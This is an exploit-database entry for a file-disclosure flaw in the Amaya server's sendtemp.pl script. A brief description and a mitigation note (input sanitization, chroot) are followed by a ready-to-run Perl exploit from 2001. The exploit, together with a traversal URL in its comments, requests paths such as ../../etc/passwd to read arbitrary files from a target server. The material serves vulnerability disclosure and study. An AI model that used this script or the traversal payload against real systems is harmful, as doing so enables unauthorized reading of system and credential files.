header-logo
Suggest Exploit
vendor:
Amaya Web development server
by:
Tom Parker (tom@rooted.net)
5.5
CVSS
MEDIUM
File Disclosure
22
CWE
Product Name: Amaya Web development server
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

sendtemp.pl File Disclosure Vulnerability

A vulnerability in the Amaya Web development server allows remote read access to files on the server's file system. By passing a malicious `templ` argument to the sendtemp.pl script, an attacker can traverse the file system and read files, such as the passwd file. This vulnerability occurs due to lack of input sanitization on the `templ` parameter.

Mitigation:

Implement proper input sanitization on the `templ` parameter to prevent directory traversal attacks. Additionally, consider running the http daemon under chroot() to further restrict access to the file system.
Source

Exploit-DB raw data:

#!/usr/bin/perl -w

# sendtemp.pl: A part of the Amaya Web development
# server contains a file disclosure  vulnerability, 
# which allows remote, read access to files 
# on the servers file system,  as whichever 
# user the httpd is running as.
#
# The Vulnerability is really quite simple..
# When the `templ` argument is past to
# sendtemp.pl it adds a link to the chosen stylesheet
# and a META field containing the publication's 
# URL of the new file to the chosen template.
# For example:
# http://localhost/cgi-bin/sendtemp.pl?templ=template.xml
# This is all well and good,  however.. 
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
#
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/sendtemp.pl?templ=../../etc/passwd"
# The systems file system can be traversed and the passwd file can be read. 
# (Assuming the http daemon hasn't been run under chroot())
#
# Follows is a simple exploit.. however, its just as easy 
# to do this manually in your web browser.
# I really couldnt be bothered to format the output in any way,
# It only encourages script kiddies.
#
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
#
# Tom Parker - tom@rooted.net
# MRX of HHP-Programming (www.hhp-programming.net)
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.

use IO::Socket;
print qq~
----------------------------------------------------------
W3.ORG sendtemp.pl exploit by Tom Parker - tom\@rooted.net
    MRX of HHP-Programming (www.hhp-programming.net)
	  -  Global InterSec INC California -
----------------------------------------------------------
~;
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage\: \%filename\.pl \<hostname\> \<file-to-get\>\n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/sendtemp.pl?templ=$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/sendtemp.pl\?templ\=$ARGV[1])\n";
while(<$SOCKET>) {
push @DATA, $_;

}
my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } 
else { print "@DATA"; }

# milw0rm.com [2001-03-04]